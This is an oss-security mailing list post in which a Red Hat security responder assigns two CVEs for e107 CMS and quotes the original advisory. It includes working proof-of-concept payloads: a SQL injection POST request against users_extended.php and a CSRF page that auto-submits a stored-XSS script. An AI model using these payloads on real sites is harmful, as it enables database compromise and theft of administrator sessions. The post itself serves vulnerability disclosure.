|
Message-ID: <4F73EDFA.3040400@redhat.com> Date: Wed, 28 Mar 2012 23:07:06 -0600 From: Kurt Seifried <kseifried@...hat.com> To: oss-security@...ts.openwall.com CC: Henri Salo <henri@...v.fi> Subject: Re: CVE-request: e107 HTB23004 On 03/28/2012 12:38 AM, Henri Salo wrote: > I won't veriify these vulnerabilities manually. Please assign 2011 CVE-identifier. > > Original advisory: https://www.htbridge.com/advisory/multiple_vulnerabilities_in_e107_1.html > These vulnerabilities have been fixed in 12306 revision. > > Please do not ask me why changelog entry does not say anything about security problems. HTBridge has tested that vulnerabilities do not exist after patches. > > From HTBridge: > > On the 6 of July a correction was released: > http://e107.svn.sourceforge.net/viewvc/e107/trunk/e107_0.7/e107_admin/users_extended.php?revision=12306&view=markup > > Details of this corrections are available here: > http://e107.svn.sourceforge.net/viewvc/e107/trunk/e107_0.7/e107_admin/users_extended.php?r1=12225&r2=12306 > > Corrections for our vulnerabilities are marked as "User extended fields administration improvements and cleanup". > > The changelog: http://e107.org/svn_changelog.php?version=0.7.26 confirms that this correction was applied to e107 0.7.26 version. > > - Henri Salo Quoted the advisory below, please include this stype of stuff in future (so I can reply clearly, and in case the wbe page goes away, etc.). Advisory Details: ============================================================ 1. SQL injection in e107 Please use CVE-2011-4946 for this issue The vulnerability exists due to failure in the "/e107_admin/users_extended.php" script to properly sanitize user-supplied input in "user_field" variable. Successful exploitation of the vulnerability requires administrator's privileges, and "magic_quotes_gpc" to be disabled. Attacker can alter queries to the application SQL database, execute arbitrary queries to the database, compromise the application, access or modify sensitive data, or exploit various vulnerabilities in the underlying SQL database. Attacker can use browser to exploit this vulnerability. The following PoC code is available: POST /e107_admin/users_extended.php?cat= HTTP/1.1 Host: HOST Cookie: <valid session cookies> Content-Type: application/x-www-form-urlencoded Content-Length: user_field=sss','',0, ','','', '0', '253','0','0','253','0','0'),('0',(select user()),'',0,'','','','0','253','0','0','253','0','0'),('0','dfg&user_applicable=253&user_re ad=0&user_write=253&add_category=Add+category ============================================================ 2. XSS in e107 Please use CVE-2011-4947 for this issue User can execute arbitrary JavaScript code within the vulnerable application. The vulnerability exists due to failure in the "/e107_admin/users_extended.php" script to properly sanitize user-supplied input in "user_include" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data. This XSS vulnerability can be exploited by a malicious user during an CSRF attack against logged-in website administrator to steal his credentials and/or perform any authorized actions with administrator's privileges. An attacker should make logged-in victim (e.g. website administrator) visit a malicious web page to exploit this vulnerability. The following PoC is available: poc.html <script> setTimeout("document.getElementById('f1').src='http://HOST/e107_admin/users_extended.php'",2000); </script> <iframe id=f1 src='form.html'></iframe> form.html <form method="POST" action="http://HOST/e107_admin/users_extended.php?editext" name=m> <input type="hidden" name="user_field" value="abcde1f1"> <input type="hidden" name="user_text" value="12121"> <input type="hidden" name="user_type" value="1"> <input type="hidden" name="user_include" value='"><script>alert(document.cookie)</script>'> <input type="hidden" name="add_field" value="1"> <input type="hidden" name="user_parent" value="0"> <input type="hidden" name="user_required" value="0"> <input type="hidden" name="user_applicable" value="255"> <input type="hidden" name="user_read" value="0"> <input type="hidden" name="user_write" value="253"> <input type="hidden" name="user_hide" value="0"> <input type=submit> </form> <script> document.m.submit(); </script> ============================================================ -- Kurt Seifried Red Hat Security Response Team (SRT)
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.